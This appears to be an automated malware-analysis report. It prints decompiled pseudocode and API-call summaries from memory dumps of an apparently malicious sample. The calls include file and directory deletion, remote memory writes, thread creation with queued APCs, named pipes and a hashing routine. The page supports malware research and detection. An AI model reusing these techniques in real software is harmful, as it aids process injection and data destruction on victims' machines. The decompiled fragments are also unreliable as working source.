								_t52 = E013E4F59(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E013E2C74(0, _t52) != 0) {
								_t121 =  *0x13ed35c; // 0x3ad95b0
								E013E3A19(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x13ed2b4; // 0x69b25f44
								_t53 = E013E4F59(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x13ed2b8; // 0x26ea5a8
								_t22 = _t54 + 0x13ee252; // 0x616d692f
								 *0x13ed304 = _t22;
								goto L60;
							} else {
								_t64 = E013E2C74(0, _t53);
								 *0x13ed304 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x13ed2b4; // 0x69b25f44
										_t56 = E013E4F59(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x13ed2b8; // 0x26ea5a8
										_t23 = _t57 + 0x13ee79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E013E2C74(0, _t56);
									}
									 *0x13ed370 = _t58;
									HeapFree( *0x13ed270, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                              0x013e294d
                              0x013e294d
                              0x013e294d
                              0x013e294d
                              0x013e2950
                              0x013e296d
                              0x013e297b
                              0x013e297b
                              0x013e2980
                              0x013e299a
                              0x013e2c08
                              0x013e2c0f
                              0x013e2c13
                              0x013e2c13
                              0x013e29a0
                              0x013e29a5
                              0x013e29bd
                              0x013e2bf5
                              0x013e2bff
                              0x00000000
                              0x013e29c3
                              0x013e29c3
                              0x013e29c4
                              0x013e29c9
                              0x013e29df
                              0x013e29cb
                              0x013e29cb
                              0x013e29d8
                              0x013e29d8
                              0x013e29e3
                              0x013e29ea
                              0x013e29ec
                              0x013e29f6
                              0x013e29fb
                              0x013e29fb
                              0x013e29f6
                              0x013e2a02
                              0x013e2a18
                              0x013e2a04
                              0x013e2a04
                              0x013e2a11
                              0x013e2a11
                              0x013e2a1c
                              0x013e2a1e
                              0x013e2a28
                              0x013e2a2d
                              0x013e2a2d
                              0x013e2a28
                              0x013e2a34
                              0x013e2a4a
                              0x013e2a36
                              0x013e2a36
                              0x013e2a43
                              0x013e2a43
                              0x013e2a4e
                              0x013e2a50
                              0x013e2a5a
                              0x013e2a5f
                              0x013e2a5f
                              0x013e2a5a
                              0x013e2a66
                              0x013e2a7c
                              0x013e2a68
                              0x013e2a68
                              0x013e2a75
                              0x013e2a75
                              0x013e2a80
                              0x013e2a82
                              0x013e2a8c
                              0x013e2a91
                              0x013e2a91
                              0x013e2a8c
                              0x013e2a98
                              0x013e2aae
                              0x013e2a9a
                              0x013e2a9a
                              0x013e2aa7
                              0x013e2aa7
                              0x013e2ab2
                              0x013e2ab4
                              0x013e2abe
                              0x013e2ac3
                              0x013e2ac3
                              0x013e2abe
                              0x013e2aca
                              0x013e2ae0
                              0x013e2acc
                              0x013e2acc
                              0x013e2ad9
                              0x013e2ad9
                              0x013e2ae4
                              0x013e2af7
                              0x013e2af7
                              0x00000000
                              0x013e2ae6
                              0x013e2ae6
                              0x013e2af0
                              0x00000000
                              0x013e2b01
                              0x013e2b01
                              0x013e2b03
                              0x013e2b19
                              0x013e2b05
                              0x013e2b05
                              0x013e2b12
                              0x013e2b12
                              0x013e2b1d
                              0x013e2b1f
                              0x013e2b22
                              0x013e2b23
                              0x013e2b2a
                              0x013e2b2c
                              0x013e2b2d
                              0x013e2b2d
                              0x013e2b2a
                              0x013e2b34
                              0x013e2b4a
                              0x013e2b36
                              0x013e2b36
                              0x013e2b43
                              0x013e2b43
                              0x013e2b4e
                              0x013e2b5c
                              0x013e2b66
                              0x013e2b66
                              0x013e2b6e
                              0x013e2b84
                              0x013e2b70
                              0x013e2b70
                              0x013e2b7d
                              0x013e2b7d
                              0x013e2b88
                              0x013e2b9b
                              0x013e2b9b
                              0x013e2ba0
                              0x013e2ba6
                              0x00000000
                              0x013e2b8a
                              0x013e2b8d
                              0x013e2b94
                              0x013e2b99
                              0x013e2bab
                              0x013e2bad
                              0x013e2bc3
                              0x013e2baf
                              0x013e2baf
                              0x013e2bbc
                              0x013e2bbc
                              0x013e2bc7
                              0x013e2bd3
                              0x013e2bd8
                              0x013e2bd8
                              0x013e2bc9
                              0x013e2bcc
                              0x013e2bcc
                              0x013e2be6
                              0x013e2beb
                              0x013e2bf1
                              0x00000000
                              0x013e2bf4
                              0x00000000
                              0x013e2b99
                              0x013e2b88
                              0x013e2af0
                              0x013e2ae4

                              APIs
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E29F2
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2A24
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2A56
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2A88
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2ABA
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,013ED00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 013E2AEC
                              • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 013E2BEB
                              • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 013E2BFF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: 551adafb86a354be9e6c7829a220ebc14c1f5787b7fbad5a53f1e779e59ce28f
                              • Instruction ID: 1dbb3814d8b9ce291d892662db8a2bd038554806ada44071daacc31c4b2c1de0
                              • Opcode Fuzzy Hash: 551adafb86a354be9e6c7829a220ebc14c1f5787b7fbad5a53f1e779e59ce28f
                              • Instruction Fuzzy Hash: 73817570A1032AAEEB30DBBCDDCCD6B7BFDAB58708B244915E101DB1C8EA75D9458720
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102D1A3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109filestringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?), ref: 0102D1BB
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0102D224
                              • lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 0102D24C
                              • RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0102D29E
                              • DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0102D2A9
                              • FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0102D2BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                              • String ID: }
                              • API String ID: 499515686-4239843852
                              • Opcode ID: 1f914b7892fa40f8826c9adccb0bc8bb7eacdc25522ae8b2c164ee5a66c879fa
                              • Instruction ID: 3949b162a54deb4aaa6c1cad20356abc1dede02ebc4326c600ac7296e0fb4cbc
                              • Opcode Fuzzy Hash: 1f914b7892fa40f8826c9adccb0bc8bb7eacdc25522ae8b2c164ee5a66c879fa
                              • Instruction Fuzzy Hash: 32419BB090021AEFDF21AFE8CD84AEEBFB8EF11354F1041A5E981A2154DB75CE48DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010449B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 010449CE
                              • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 01044A86
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 01044A1C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 01044A35
                              • GetLastError.KERNEL32(?,?,?,?), ref: 01044A54
                              • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 01044A66
                              • GetLastError.KERNEL32(?,?,?,?), ref: 01044A6E
                              Strings
                              • Software\Microsoft\WAB\DLLPath, xrefs: 010449BF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                              • String ID: Software\Microsoft\WAB\DLLPath
                              • API String ID: 1628847533-3156921957
                              • Opcode ID: 946ee08676ee02b74b6fd0c0c73f2fe9a5c38c4a7e19f97005c28f59e8cfd62e
                              • Instruction ID: 44c4a3c78bc1642a8eafe92d58d47e970411bd3c54319da876e4be6779915d21
                              • Opcode Fuzzy Hash: 946ee08676ee02b74b6fd0c0c73f2fe9a5c38c4a7e19f97005c28f59e8cfd62e
                              • Instruction Fuzzy Hash: B5216DB5900118FBDB31ABA89DC8EAEBFBCEB84250B1541B5F992E3115D6364E10CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010259E6, Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0102DE50: ExpandEnvironmentStringsW.KERNEL32(761506E0,00000000,00000000,761506E0,00000020,80000001,01022289,?,761506E0), ref: 0102DE61
                                • Part of subcall function 0102DE50: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0102DE7E
                              • FreeLibrary.KERNEL32(?), ref: 01025B1C
                                • Part of subcall function 01033FE6: lstrlenW.KERNEL32(?,00000000,?,?,?,01025A61,?,?), ref: 01033FF3
                                • Part of subcall function 01033FE6: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,01025A61,?,?), ref: 0103401C
                                • Part of subcall function 01033FE6: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0103403C
                                • Part of subcall function 01033FE6: lstrcpyW.KERNEL32(-00000002,?), ref: 01034057
                                • Part of subcall function 01033FE6: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,01025A61,?,?), ref: 01034063
                                • Part of subcall function 01033FE6: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,01025A61,?,?), ref: 01034066
                                • Part of subcall function 01033FE6: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,01025A61,?,?), ref: 01034072
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 0103408F
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 010340A9
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 010340BF
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 010340D5
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 010340EB
                                • Part of subcall function 01033FE6: GetProcAddress.KERNEL32(00000000,?), ref: 01034101
                              • FindFirstFileW.KERNEL32(?,?,?,?), ref: 01025A72
                              • lstrlenW.KERNEL32(?), ref: 01025A8E
                              • lstrlenW.KERNEL32(?), ref: 01025AA6
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpyW.KERNEL32(00000000,?), ref: 01025ABF
                              • lstrcpyW.KERNEL32(00000002), ref: 01025AD4
                                • Part of subcall function 01032DDE: lstrlenW.KERNEL32(?,00000000,747C8250,747869A0,?,?,?,01025AE4,?,00000000,?), ref: 01032DEE
                                • Part of subcall function 01032DDE: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,01025AE4,?,00000000,?), ref: 01032E10
                                • Part of subcall function 01032DDE: lstrcpyW.KERNEL32(00000000,?), ref: 01032E3C
                                • Part of subcall function 01032DDE: lstrcatW.KERNEL32(00000000,?), ref: 01032E4F
                              • FindNextFileW.KERNEL32(?,00000010), ref: 01025AFC
                              • FindClose.KERNEL32(00000002), ref: 01025B0A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                              • String ID:
                              • API String ID: 1209511739-0
                              • Opcode ID: 89fc398d2ca41fe14fdf174142b3a1e97ac8f888e7a2f5a50d54ecdb22d3de29
                              • Instruction ID: 5eb4b2e0812deb7569d8b0e4505cdfcb3823c5de1ad9c9405d3b6809daf8685d
                              • Opcode Fuzzy Hash: 89fc398d2ca41fe14fdf174142b3a1e97ac8f888e7a2f5a50d54ecdb22d3de29
                              • Instruction Fuzzy Hash: 2D4159715083169BD721EF28DD84AAFBBE8FB84744F04092AF6D4D2150DB36D909CFA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102C0CF, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0102C0F1
                                • Part of subcall function 010309CA: NtAllocateVirtualMemory.NTDLL(0102C119,00000000,00000000,0102C119,00003000,00000040), ref: 010309FB
                                • Part of subcall function 010309CA: RtlNtStatusToDosError.NTDLL(00000000), ref: 01030A02
                                • Part of subcall function 010309CA: SetLastError.KERNEL32(00000000), ref: 01030A09
                              • GetLastError.KERNEL32(?,00000318,00000008), ref: 0102C201
                                • Part of subcall function 0102D049: RtlNtStatusToDosError.NTDLL(00000000), ref: 0102D061
                              • memcpy.NTDLL(00000218,01048D80,00000100,?,00010003,?,?,00000318,00000008), ref: 0102C180
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0102C1DA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                              • String ID:
                              • API String ID: 2966525677-3916222277
                              • Opcode ID: d99032b00682247a6351e928c6ecbe7a9765e0224e3bfb7def754f89f4213f8a
                              • Instruction ID: 2769764971fcc36e7f11ea0c30a15872fac349a52b7d4c1e58247412b2d3a335
                              • Opcode Fuzzy Hash: d99032b00682247a6351e928c6ecbe7a9765e0224e3bfb7def754f89f4213f8a
                              • Instruction Fuzzy Hash: E831857190131AEFEB21DFA4DA85A9EB7F8FB15344F10456AE59AE3140D7309A44CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010262CD, Relevance: 7.9, APIs: 6, Instructions: 399COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset$memcpy
                              • String ID:
                              • API String ID: 368790112-0
                              • Opcode ID: 5a0e4142b812b1006d80ff604bd9fa7373dd9bc1c953f38140ca897adef66fa0
                              • Instruction ID: dd6238bc19fa3bb008bd6b06bfe5cfec91c5491055e7a8f35968e614b2a940d0
                              • Opcode Fuzzy Hash: 5a0e4142b812b1006d80ff604bd9fa7373dd9bc1c953f38140ca897adef66fa0
                              • Instruction Fuzzy Hash: B5F10570500BA9CFCB32CF68C5946EABBF4FF51304F2449ADC9D796682D632AA45CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103C0B8, Relevance: 6.1, APIs: 4, Instructions: 111stringnativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 0103C10E
                              • lstrlenW.KERNEL32(?), ref: 0103C11C
                              • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0103C147
                              • lstrcpyW.KERNEL32(00000006,00000000), ref: 0103C174
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Query$lstrcpylstrlen
                              • String ID:
                              • API String ID: 3961825720-0
                              • Opcode ID: 007b3b9d221b3fa6388008f4e582bd6f39b83cb22f445fb3d03b1789eff2da16
                              • Instruction ID: a7daee046066aacfb2dc4359b696fcdd423b12ecad809c8bed0ca2aa0191b66b
                              • Opcode Fuzzy Hash: 007b3b9d221b3fa6388008f4e582bd6f39b83cb22f445fb3d03b1789eff2da16
                              • Instruction Fuzzy Hash: 07414DB550020AFFEB118FA8CA84AAEBBACFF45310F00406AFA91E6154D775DA11AB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102E521, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                              Download Yara Rule
                              APIs
                              • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,01050244,00000001), ref: 0102E545
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0102E590
                                • Part of subcall function 01023475: CreateThread.KERNELBASE(00000000,00000000,00000000,?,010501F8,010210B6), ref: 0102348C
                                • Part of subcall function 01023475: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 010234A1
                                • Part of subcall function 01023475: GetLastError.KERNEL32(00000000), ref: 010234AC
                                • Part of subcall function 01023475: TerminateThread.KERNEL32(00000000,00000000), ref: 010234B6
                                • Part of subcall function 01023475: CloseHandle.KERNEL32(00000000), ref: 010234BD
                                • Part of subcall function 01023475: SetLastError.KERNEL32(00000000), ref: 010234C6
                              • GetLastError.KERNEL32(Function_00012AB7,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 0102E578
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0102E588
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                              • String ID:
                              • API String ID: 1700061692-0
                              • Opcode ID: da7e04792a9994553b66237fd34b714b289ad332213ce8d017ebea463225d626
                              • Instruction ID: d1d5001b591c4e966bf2d8c59de54bafd2e4d1a78637d1a58fcabd552bfc9c0e
                              • Opcode Fuzzy Hash: da7e04792a9994553b66237fd34b714b289ad332213ce8d017ebea463225d626
                              • Instruction Fuzzy Hash: 90F081B5381221AFF3605A689C88A6F7B58EB89371B100534FA96C6294E6794C058AA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103CFE8, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0103CFFC
                              • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0103D03C
                                • Part of subcall function 01044FEA: NtWriteVirtualMemory.NTDLL(?,00000004,?,?,?,74786780,?,0103FDBE,?,00000004,?,00000004,?), ref: 01045008
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0103D045
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                              • String ID:
                              • API String ID: 4036914670-0
                              • Opcode ID: e54985493e43219eb05bda364d8188d86fa2ddf75db84c97ce1fee641ef8af69
                              • Instruction ID: bdaedd4c420c1763e14950247c3c42f32ac551dffc7e63bc8a77344b4d14491f
                              • Opcode Fuzzy Hash: e54985493e43219eb05bda364d8188d86fa2ddf75db84c97ce1fee641ef8af69
                              • Instruction Fuzzy Hash: F001FB79A40108FFEB11ABE5DD45EEEBBBDEB88740F500025FA81E2154E77AD9059B20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01029690, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 010296C1
                              • RtlNtStatusToDosError.NTDLL(C000009A), ref: 010296F8
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorFreeHeapInformationQueryStatusSystem
                              • String ID:
                              • API String ID: 2533303245-0
                              • Opcode ID: bd33a61cb377857044a67e75872286324ff4fab75825e546a63ae19b6ceea9c0
                              • Instruction ID: a5a2ac2cc5e76f654b80b0aa0424592c9d3d337c67ccecd5dc5f3873a2e5c9aa
                              • Opcode Fuzzy Hash: bd33a61cb377857044a67e75872286324ff4fab75825e546a63ae19b6ceea9c0
                              • Instruction Fuzzy Hash: 2501D676902135AFE7315A58C90CAEF7EEC9F4DB58F060164EEC1A3100D7768E00D6E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01042CA5, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 01042CC4
                              • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 01042CDC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InformationProcessQuerymemset
                              • String ID:
                              • API String ID: 2040988606-0
                              • Opcode ID: d20d2a8e88e3206689911aa12222e4c6782cefaeb0178db0447842b9ef59fbc6
                              • Instruction ID: 53b50c13e9bc88c4e99c88f493f666799176aab7eb2e1eaeb256df575a209e2b
                              • Opcode Fuzzy Hash: d20d2a8e88e3206689911aa12222e4c6782cefaeb0178db0447842b9ef59fbc6
                              • Instruction Fuzzy Hash: 16F044B5A0022CBBDB10DA95DC45FDE7B6C9B14740F404060FA44E2191D370DA448BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01027E6C, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                              Download Yara Rule
                              APIs
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01027E99
                              • SetLastError.KERNEL32(00000000,?,01033BF0,?,?,?,00000004,?,00000000,010501F4,?,00000000), ref: 01027EA0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$LastStatus
                              • String ID:
                              • API String ID: 4076355890-0
                              • Opcode ID: 99761d4775154a4adbea45878fa5a1dc9c0b4cebf4511c645ace6d26c2d3fa92
                              • Instruction ID: 83dc4563056cc18296c9b4c7ee3c10395ee44d82d52a3023b65e325ce3c77748
                              • Opcode Fuzzy Hash: 99761d4775154a4adbea45878fa5a1dc9c0b4cebf4511c645ace6d26c2d3fa92
                              • Instruction Fuzzy Hash: 0CE01A7720022AEBDF115FE8AE04D8A7B69EB1C781B004020FF41C2120C63AC820ABB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01034F12, Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 010352EA
                              • memset.NTDLL ref: 010352F9
                                • Part of subcall function 0103EDCC: memset.NTDLL ref: 0103EDDD
                                • Part of subcall function 0103EDCC: memset.NTDLL ref: 0103EDE9
                                • Part of subcall function 0103EDCC: memset.NTDLL ref: 0103EE14
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: f0541a7332941da5967c5b617b5980c67a411601c8d66521be409c84e3452cf6
                              • Instruction ID: 34bbf0c9c1b45152be5719d435b39c043e24c77a72948e6cef3052095c8b732c
                              • Opcode Fuzzy Hash: f0541a7332941da5967c5b617b5980c67a411601c8d66521be409c84e3452cf6
                              • Instruction Fuzzy Hash: FF022370501B518FC776CF29CA80567BBF9BF91610B644E2ED6E786AA1E372F481CB04
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010298C2, Relevance: 1.9, APIs: 1, Instructions: 610COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 8f88828fdede64b7dc8edc789b3ba7c8fa2c8197a3d153c564b909b39e2268ae
                              • Instruction ID: ecfa8e71baf306eb8c02db2eb056a415fccc42f6b5cf39a62a407dc984c08b27
                              • Opcode Fuzzy Hash: 8f88828fdede64b7dc8edc789b3ba7c8fa2c8197a3d153c564b909b39e2268ae
                              • Instruction Fuzzy Hash: 8122847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E3373, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E013E3373(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
